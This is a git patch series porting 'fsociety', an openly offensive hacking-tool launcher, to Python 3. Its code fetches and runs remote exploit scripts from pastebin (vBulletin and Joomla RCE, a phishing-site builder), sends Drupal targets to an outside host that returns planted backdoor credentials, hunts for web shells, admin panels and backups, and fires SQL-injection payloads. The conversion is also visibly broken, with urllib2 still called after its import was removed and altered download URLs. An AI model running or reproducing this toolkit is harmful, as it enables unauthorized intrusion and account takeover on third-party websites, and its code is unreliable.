From 095ae51316ecd6a0220a2f02acf6a267eb15221f Mon Sep 17 00:00:00 2001 From: youshitsune Date: Mon, 22 May 2023 14:29:47 +0200 Subject: [PATCH 1/2] Convert to Python3 --- fsociety.py | 294 ++++++++++++++++++++++++++-------------------------- 1 file changed, 146 insertions(+), 148 deletions(-) diff --git a/fsociety.py b/fsociety.py index 56f6573..afe260f 100644 --- a/fsociety.py +++ b/fsociety.py @@ -20,10 +20,9 @@ import sys import argparse import os -import httplib +import http import subprocess import re -import urllib2 import socket import urllib import sys @@ -31,16 +30,16 @@ import telnetlib import glob import random -import Queue +from queue import Queue import threading import base64 import time -import ConfigParser +import configparser as ConfigParser from sys import argv -from commands import * +from cmd import * from getpass import getpass from xml.dom import minidom -from urlparse import urlparse +from urllib.parse import urlparse from optparse import OptionParser from time import gmtime, strftime, sleep @@ -67,7 +66,7 @@ def clearScr(): def yesOrNo(): - return (raw_input("Continue Y / N: ") in yes) + return (input("Continue Y / N: ") in yes) ''' @@ -76,7 +75,7 @@ def yesOrNo(): installDir = os.path.dirname(os.path.abspath(__file__)) + '/' configFile = installDir + "/fsociety.cfg" print(installDir) -config = ConfigParser.RawConfigParser() +config = ConfigParser.ConfigParser() config.read(configFile) toolDir = installDir + config.get('fsociety', 'toolDir') @@ -135,7 +134,7 @@ def agreement(): clearScr() print(termsAndConditions) print(mrrobot4) - agree = raw_input("You must agree to our terms and conditions first (Y/n) ").lower() + agree = input("You must agree to our terms and conditions first (Y/n) ").lower() if agree in yes: config.set('fsociety', 'agreement', 'true') @@ -159,7 +158,7 @@ def __init__(self): {11}-CONTRIBUTORS {99}-EXIT\n ''') - choice = raw_input(fsocietyPrompt) + choice = input(fsocietyPrompt) clearScr() if choice == "1": informationGatheringMenu() @@ -215,7 +214,7 @@ def createFolders(self): os.makedirs(logDir) def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() def update(self): @@ -242,7 +241,7 @@ def __init__(self): " {3}--pyPISHER - Tool to create a mallicious website for password pishing") print(" {4}--SMTP Mailer - Tool to send SMTP mail\n ") print(" {99}-Back To Main Menu \n") - choice6 = raw_input(fsocietyPrompt) + choice6 = input(fsocietyPrompt) clearScr() if choice6 == "1": setoolkit() @@ -259,7 +258,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -288,7 +287,7 @@ def __init__(self): " {11}-BruteX - Automatically brute force all services running on a target") print(" {12}-Arachni - Web Application Security Scanner Framework \n ") print(" {99}-Back To Main Menu \n") - choiceweb = raw_input(fsocietyPrompt) + choiceweb = input(fsocietyPrompt) clearScr() if choiceweb == "1": maine() @@ -321,7 +320,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -336,12 +335,12 @@ class privateWebHacking: def __init__(self): clearScr() print(self.menuLogo) - target = raw_input("Enter Target IP: ") + target = input("Enter Target IP: ") Fscan(target) self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -360,7 +359,7 @@ def __init__(self): print(" {2}--POET") print(" {3}--Phishing Framework \n") print(" {99}-Return to main menu \n ") - choice11 = raw_input(fsocietyPrompt) + choice11 = input(fsocietyPrompt) clearScr() if choice11 == "1": sitechecker() @@ -375,7 +374,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -405,7 +404,7 @@ def __init__(self): print(" {7}--Doork") print(" {8}--Crips\n ") print(" {99}-Back To Main Menu \n") - choice2 = raw_input(fsocietyPrompt) + choice2 = input(fsocietyPrompt) clearScr() if choice2 == "1": nmap() @@ -430,7 +429,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -466,7 +465,7 @@ def install(self): def run(self): clearScr() print(self.nmapLogo) - target = raw_input(self.targetPrompt) + target = input(self.targetPrompt) self.menu(target) def menu(self, target): @@ -477,19 +476,19 @@ def menu(self, target): print(" {2}--Port Scan [-Pn]") print(" {3}--Operating System Detection [-A]\n") print(" {99}-Return to information gathering menu \n") - response = raw_input("nmap ~# ") + response = input("nmap ~# ") clearScr() logPath = "logs/nmap-" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) try: if response == "1": os.system("nmap -sV -oN %s %s" % (logPath, target)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "2": os.system("nmap -Pn -oN %s %s" % (logPath, target)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "3": os.system("nmap -A -oN %s %s" % (logPath, target)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "99": pass else: @@ -509,7 +508,7 @@ def __init__(self): else: print(alreadyInstalled) self.run() - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isfile("/usr/bin/setoolkit")) @@ -536,10 +535,10 @@ class host2ip: def __init__(self): clearScr() print(self.host2ipLogo) - host = raw_input(" Enter a Host: ") + host = input(" Enter a Host: ") ip = socket.gethostbyname(host) print(" %s has the IP of %s" % (host, ip)) - response = raw_input(continuePrompt) + response = input(continuePrompt) class wpscan: @@ -558,7 +557,7 @@ def __init__(self): self.install() clearScr() print(self.wpscanLogo) - target = raw_input(" Enter a Target: ") + target = input(" Enter a Target: ") self.menu(target) def installed(self): @@ -576,7 +575,7 @@ def menu(self, target): print(" {2}--Plugin Enumeration [--enumerate p]") print(" {3}--All Enumeration Tools [--enumerate]\n") print(" {99}-Return to information gathering menu \n") - response = raw_input("wpscan ~# ") + response = input("wpscan ~# ") clearScr() logPath = "../../logs/wpscan-" + \ strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt" @@ -585,15 +584,15 @@ def menu(self, target): if response == "1": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate u --log %s" % (wpscanOptions, logPath)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "2": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate p --log %s" % (wpscanOptions, logPath)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "3": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate --log %s" % (wpscanOptions, logPath)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "99": pass else: @@ -618,9 +617,9 @@ def __init__(self): self.install() clearScr() print(self.CMSmapLogo) - target = raw_input(" Enter a Target: ") + target = input(" Enter a Target: ") self.run(target) - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -656,7 +655,7 @@ def __init__(self): clearScr() print(self.XSStrikeLogo) self.run() - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -686,9 +685,9 @@ def __init__(self): self.install() clearScr() print(self.doorkLogo) - target = raw_input(" Enter a Target: ") + target = input(" Enter a Target: ") self.run(target) - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -763,7 +762,7 @@ def __init__(self): print( " {2}--BruteX - Automatically bruteforces all services running on a target\n") print(" {99}-Back To Main Menu \n") - choice3 = raw_input("passwd ~# ") + choice3 = input("passwd ~# ") clearScr() if choice3 == "1": cupp() @@ -776,7 +775,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -829,7 +828,7 @@ def __init__(self): print(" {2}--pixiewps") print(" {3}--Bluetooth Honeypot GUI Framework \n") print(" {99}-Back To The Main Menu \n") - choice4 = raw_input(fsocietyPrompt) + choice4 = input(fsocietyPrompt) clearScr() if choice4 == "1": reaver() @@ -844,7 +843,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -914,7 +913,7 @@ def installed(self): def install(self): os.system("apt-get install libbluetooth-dev") os.system( - "wget -O - https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz | tar xfz -") + "wget -O - https://github.com/andrewmichaelsmith/bluepot/master/bin/bluepot-0.1.tar.gz | tar xfz -") os.system("mv bluepot/ %s/" % self.installDir) def run(self): @@ -947,7 +946,7 @@ def __init__(self): print(" {8}--Bruteforce the Android Passcode given the hash and salt") print(" {9}--Joomla SQL injection Scanner \n ") print(" {99}-Go Back To Main Menu \n") - choice5 = raw_input(fsocietyPrompt) + choice5 = input(fsocietyPrompt) clearScr() if choice5 == "1": atscan() @@ -974,7 +973,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -999,7 +998,7 @@ def install(self): os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir) def run(self): - target = raw_input("Enter Target IP: ") + target = input("Enter Target IP: ") os.system("brutex %s" % target) @@ -1024,7 +1023,7 @@ def install(self): "gem install bundler && bundle install --without prof && rake install") def run(self): - target = raw_input("Enter Target Hostname: ") + target = input("Enter Target Hostname: ") os.system("arachni %s --output-debug 2> %sarachni/%s.log" % (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) @@ -1042,15 +1041,15 @@ def weeman(): def gabriel(): print("Abusing authentication bypass of Open&Compact (Gabriel's)") - os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") + os.system("wget http://pastebin.com/Szg20yUh --output-document=gabriel.py") clearScr() os.system("python gabriel.py") - ftpbypass = raw_input("Enter Target IP and Use Command:") + ftpbypass = input("Enter Target IP and Use Command:") os.system("python gabriel.py %s" % ftpbypass) def sitechecker(): - os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py") + os.system("wget http://pastebin.com/Y0cqkjrj --output-document=ch01.py") clearScr() os.system("python ch01.py") @@ -1058,7 +1057,7 @@ def sitechecker(): def ifinurl(): print(''' This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.''') print('Do You Want To Install InurlBR ? ') - cinurl = raw_input("Y/N: ") + cinurl = input("Y/N: ") if cinurl in yes: inurl() else: @@ -1068,7 +1067,7 @@ def ifinurl(): def bsqlbf(): clearScr() print("This tool will only work on blind sql injection") - cbsq = raw_input("select target: ") + cbsq = input("select target: ") os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") os.system("perl bsqlbf.pl -url %s" % cbsq) os.system("rm bsqlbf.pl") @@ -1098,21 +1097,21 @@ def commix(): def vbulletinrce(): - os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl") + os.system("wget http://pastebin.com/eRSkgnZk --output-document=tmp.pl") os.system("perl tmp.pl") def joomlarce(): - os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") + os.system("wget http://pastebin.com/EX7Gcbxk --output-document=temp.py") clearScr() print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") - jmtarget = raw_input("Select a targets list:") + jmtarget = input("Select a targets list:") os.system("python temp.py %s" % jmtarget) def inurl(): - dork = raw_input("select a Dork:") - output = raw_input("select a file to save:") + dork = input("select a Dork:") + output = input("select a file to save:") os.system( "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) webHackingMenu.completed("InurlBR") @@ -1145,8 +1144,8 @@ def jboss(): def wppluginscan(): Notfound = [404, 401, 400, 403, 406, 301] - sitesfile = raw_input("sites file: ") - filepath = raw_input("Plugins File: ") + sitesfile = input("sites file: ") + filepath = input("Plugins File: ") def scan(site, dir): global resp @@ -1191,9 +1190,9 @@ def grabuploadedlink(url): for dir in directories: currentcode = urllib.urlopen(url + dir).getcode() if currentcode == 200 or currentcode == 403: - print "-------------------------" - print " [ + ] Found Directory: " + str(url + dir) + " [ + ]" - print "-------------------------" + print("-------------------------") + print(" [ + ] Found Directory: " + str(url + dir) + " [ + ]") + print("-------------------------") upload.append(url + dir) except: pass @@ -1205,17 +1204,17 @@ def grabshell(url): for shell in shells: currentcode = urllib.urlopen(upl + shell).getcode() if currentcode == 200: - print "-------------------------" - print " [ ! ] Found Shell: " + \ - str(upl + shell) + " [ ! ]" - print "-------------------------" + print("-------------------------") + print(" [ ! ] Found Shell: " + \ + str(upl + shell) + " [ ! ]") + print("-------------------------") except: pass def shelltarget(): print("Exemple: http://target.com") - line = raw_input("target: ") + line = input("target: ") line = line.rstrip() grabuploadedlink(line) grabshell(line) @@ -1290,11 +1289,11 @@ def check_gravityforms(sites): def gravity(): - ip = raw_input('Enter IP: ') + ip = input('Enter IP: ') sites = bing_all_grabber(str(ip)) gravityforms = check_gravityforms(sites) for ss in gravityforms: - print ss + print(ss) print('\n') print('[*] Found, ', len(gravityforms), ' gravityforms.') @@ -1311,8 +1310,8 @@ def shellnoob(): def androidhash(): - key = raw_input("Enter the android hash: ") - salt = raw_input("Enter the android salt: ") + key = input("Enter the android hash: ") + salt = input("Enter the android salt: ") os.system( "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") os.system( @@ -1321,20 +1320,20 @@ def androidhash(): def cmsfew(): print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ") - target = raw_input("Select a target: ") + target = input("Select a target: ") os.system( "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") os.system("python cms.py %s" % target) def smtpsend(): - os.system("wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py") + os.system("wget http://pastebin.com/Nz1GzWDS --output-document=smtp.py") clearScr() os.system("python smtp.py") def pisher(): - os.system("wget http://pastebin.com/raw/DDVqWp4Z --output-document=pisher.py") + os.system("wget http://pastebin.com/DDVqWp4Z --output-document=pisher.py") clearScr() os.system("python pisher.py") @@ -1370,9 +1369,9 @@ class Fscan: def __init__(self, serverip): self.serverip = serverip self.getSites(False) - print menuu + print(menuu) while True: - choice = raw_input(fsocietyPrompt) + choice = input(fsocietyPrompt) if choice == '1': self.getSites(True) elif choice == '2': @@ -1390,7 +1389,7 @@ def __init__(self, serverip): elif choice == '8': self.grabSqli() elif choice == '9': - ran = raw_input(' Enter range of ports, (ex: 1-1000) -> ') + ran = input(' Enter range of ports, (ex: 1-1000) -> ') self.portScanner(1, ran) elif choice == '10': self.portScanner(2, None) @@ -1400,12 +1399,12 @@ def __init__(self, serverip): self.cloudflareBypasser() elif choice == '99': fsociety() - con = raw_input(' Continue [Y/n] -> ') + con = input(' Continue [Y/n] -> ') if con[0].upper() == 'N': exit() else: clearScr() - print menuu + print(menuu) def getSites(self, a): ''' @@ -1439,7 +1438,7 @@ def getSites(self, a): clearScr() print('[*] Found ', len(lista), ' Website\n') for site in self.sites: - print site + print(site) def getWordpress(self): ''' @@ -1468,7 +1467,7 @@ def getWordpress(self): clearScr() print('[*] Found ', len(lista), ' Wordpress Website\n') for site in lista: - print site + print(site) def getJoomla(self): ''' @@ -1493,7 +1492,7 @@ def getJoomla(self): clearScr() print('[*] Found ' + len(lista) + ' Joomla Website\n') for site in lista: - print site + print(site) ############################ # find admin panels @@ -1503,7 +1502,7 @@ def findPanels(self): the attacker may do a lot of vulnerability tests on the admin area ''' - print "[~] Finding admin panels" + print("[~] Finding admin panels") adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site'] clearScr() @@ -1511,7 +1510,7 @@ def findPanels(self): for admin in adminList: try: if urllib.urlopen(site + admin).getcode() == 200: - print " [*] Found admin panel -> ", site + admin + print(" [*] Found admin panel -> ", site + admin) except IOError: pass ############################ @@ -1525,12 +1524,12 @@ def findZip(self): zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] clearScr() - print "[~] Finding zip file" + print("[~] Finding zip file") for site in self.sites: for zip1 in zipList: try: if urllib.urlopen(site + zip1).getcode() == 200: - print " [*] Found zip file -> ", site + zip1 + print(" [*] Found zip file -> ", site + zip1) except IOError: pass @@ -1543,7 +1542,7 @@ def findUp(self): upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] clearScr() - print "[~] Finding Upload" + print("[~] Finding Upload") for site in self.sites: for up in upList: try: @@ -1551,7 +1550,7 @@ def findUp(self): html = urllib.urlopen(site + up).readlines() for line in html: if re.findall('type=file', line): - print " [*] Found upload -> ", site + up + print(" [*] Found upload -> ", site + up) except IOError: pass @@ -1564,7 +1563,7 @@ def getUsers(self): (you can use medusa or hydra) ''' clearScr() - print "[~] Grabbing Users" + print("[~] Grabbing Users") userslist = [] for site1 in self.sites: try: @@ -1579,11 +1578,11 @@ def getUsers(self): resp = urllib2.urlopen( site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() if 'invalid username' not in resp.lower(): - print '\t [*] Found -> ', site + print('\t [*] Found -> ', site) userslist.append(site) break else: - print site + print(site) site = site[:-1] except: @@ -1591,7 +1590,7 @@ def getUsers(self): clearScr() for user in userslist: - print user + print(user) def cloudflareBypasser(self): ''' @@ -1600,7 +1599,7 @@ def cloudflareBypasser(self): method from a guy in madleets ''' clearScr() - print "[~] Bypassing cloudflare" + print("[~] Bypassing cloudflare") subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] for site in self.sites: site.replace('http://', '') @@ -1611,11 +1610,11 @@ def cloudflareBypasser(self): pass for sub in subdoms: doo = sub + '.' + site - print ' [~] Trying -> ', doo + print(' [~] Trying -> ', doo) try: ddd = socket.gethostbyname(doo) if ddd != ip: - print ' [*] Cloudflare bypassed -> ', ddd + print(' [*] Cloudflare bypassed -> ', ddd) break except socket.error: pass @@ -1630,8 +1629,7 @@ def getServerBanner(self): try: s = 'http://' + self.serverip httpresponse = urllib.urlopen(s) - print ' [*] Server header -> ', httpresponse.headers.getheader( - 'server') + print(' [*] Server header -> ', httpresponse.headers.getheader('server')) except: print('[*] Server header -> Not Found') @@ -1667,7 +1665,7 @@ def checkSqli(self, s): tool in my blog ''' clearScr() - print "[~] Checking SQL injection" + print("[~] Checking SQL injection") payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] check = re.compile( @@ -1682,7 +1680,7 @@ def checkSqli(self, s): for line in html: checker = re.findall(check, line) if len(checker) != 0: - print ' [*] SQLi found -> ', power + print(' [*] SQLi found -> ', power) except: pass @@ -1693,7 +1691,7 @@ def portScanner(self, mode, ran): or with common ports (al-swisre idea) ''' clearScr() - print "[~] Scanning Ports" + print("[~] Scanning Ports") if mode == 1: a = ran.split('-') @@ -1711,7 +1709,7 @@ def do_it(ip, port): sock = sock.connect_ex((ip, port)) if sock == 0: - print " [*] Port %i is open" % port + print(" [*] Port %i is open" % port) ############################ @@ -1725,7 +1723,7 @@ def do_it(ip, port): def drupal(): '''Drupal Exploit Binger All Websites Of server ''' - ip = raw_input('1- IP: ') + ip = input('1- IP: ') page = 1 while page <= 50: @@ -1744,29 +1742,29 @@ def drupal(): urlpa = urlparse(url) site = urlpa.netloc - print "[+] Testing At " + site + print("[+] Testing At " + site) resp = urllib2.urlopen( 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit') read = resp.read() if "User: HolaKo" in read: - print "Exploit found =>" + site + print("Exploit found =>" + site) - print "user:HolaKo\npass:admin" + print("user:HolaKo\npass:admin") a = open('up.txt', 'a') a.write(site + '\n') a.write("user:" + user + "\npass:" + pwd + "\n") else: - print "[-] Expl Not Found:( " + print("[-] Expl Not Found:( ") except Exception as ex: - print ex + print(ex) sys.exit(0) # Drupal Server ExtraCtor def getdrupal(): - ip = raw_input('Enter The Ip: ') + ip = input('Enter The Ip: ') page = 1 sites = list() while page <= 50: @@ -1783,14 +1781,14 @@ def getdrupal(): split = urlparse(url) site = split.netloc if site not in sites: - print site + print(site) sites.append(site) # Drupal Mass List Exploiter def drupallist(): - listop = raw_input("Enter The list Txt: ") + listop = input("Enter The list Txt: ") fileopen = open(listop, 'r') content = fileopen.readlines() for i in content: @@ -1800,22 +1798,22 @@ def drupallist(): 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit') readcontent = openurl.read() if "Success" in readcontent: - print "[+]Success =>" + url - print "[-]username:HolaKo\n[-]password:admin" + print("[+]Success =>" + url) + print("[-]username:HolaKo\n[-]password:admin") save = open('drupal.txt', 'a') save.write( url + "\n" + "[-]username:HolaKo\n[-]password:admin\n") else: - print i + "=> exploit not found " + print(i + "=> exploit not found ") except Exception as ex: - print ex + print(ex) def maine(): - print minu - choose = raw_input("choose a number: ") + print(minu) + choose = input("choose a number: ") while True: if choose == "1": @@ -1891,20 +1889,20 @@ def check_joomla(sites): def wppjmla(): - ipp = raw_input('Enter Target IP: ') + ipp = input('Enter Target IP: ') sites = bing_all_grabber(str(ipp)) wordpress = check_wordpress(sites) joomla = check_joomla(sites) for ss in wordpress: - print ss - print '[+] Found ! ', len(wordpress), ' Wordpress Websites' - print '-' * 30 + '\n' + print(ss) + print('[+] Found ! ', len(wordpress), ' Wordpress Websites') + print('-' * 30 + '\n') for ss in joomla: - print ss + print(ss) - print '[+] Found ! ', len(joomla), ' Joomla Websites' + print('[+] Found ! ', len(joomla), ' Joomla Websites') - print '\n' + print('\n') # initialise the fscan function ############################ @@ -1912,8 +1910,8 @@ def wppjmla(): def grabsqli(ip): try: - print color.OKBLUE + "Check_Uplaod... " - print '\n' + print(color.OKBLUE + "Check_Uplaod... ") + print('\n') page = 1 while page <= 21: @@ -1927,7 +1925,7 @@ def grabsqli(ip): try: response = urllib2.urlopen(i).read() checksqli(i) - except urllib2.HTTPError, e: + except urllib2.HTTPError as e: str(sites).strip(i) page = page + 10 @@ -1943,7 +1941,7 @@ def checksqli(sqli): def sqlscan(): - ip = raw_input('Enter IP -> ') + ip = input('Enter IP -> ') grabsqli(ip) @@ -2053,7 +2051,7 @@ def check_wpsymposium(sites): def wpminiscanner(): - ip = raw_input('Enter IP: ') + ip = input('Enter IP: ') sites = bing_all_grabber(str(ip)) wordpress = check_wordpress(sites) wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites) @@ -2062,32 +2060,32 @@ def wpminiscanner(): wpeasyupload = check_wpeasyupload(sites) wpsymposium = check_wpsymposium(sites) for ss in wordpress: - print ss - print '[*] Found, ', len(wordpress), ' wordpress sites.' - print '-' * 30 + '\n' + print(ss) + print('[*] Found, ', len(wordpress), ' wordpress sites.') + print('-' * 30 + '\n') for ss in wpstorethemeremotefileupload: - print ss - print '[*] Found, ', len( - wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.' - print '-' * 30 + '\n' + print(ss) + print('[*] Found, ', len( + wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.') + print('-' * 30 + '\n') for ss in wpcontactcreativeform: - print ss - print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.' - print '-' * 30 + '\n' + print(ss) + print('[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.') + print('-' * 30 + '\n') for ss in wplazyseoplugin: - print ss - print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.' - print '-' * 30 + '\n' + print(ss) + print('[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.') + print('-' * 30 + '\n') for ss in wpeasyupload: - print ss - print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.' - print '-' * 30 + '\n' + print(ss) + print('[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.') + print('-' * 30 + '\n') for ss in wpsymposium: - print ss + print(ss) - print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.' + print('[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.') - print '\n' + print('\n') ############################ From b9f55286a71b05c7d8d4577e5818a5a3b0075b69 Mon Sep 17 00:00:00 2001 From: youshitsune Date: Wed, 24 May 2023 17:00:26 +0200 Subject: [PATCH 2/2] Update fsociety.cfg --- fsociety.cfg | 5 ----- 1 file changed, 5 deletions(-) diff --git a/fsociety.cfg b/fsociety.cfg index 5c08834..e69de29 100644 --- a/fsociety.cfg +++ b/fsociety.cfg @@ -1,5 +0,0 @@ -[fsociety] -agreement = false -toolDir = tools/ -logDir = logs/ -yes = yes y ye ya yep yeah yee yeperoo not-no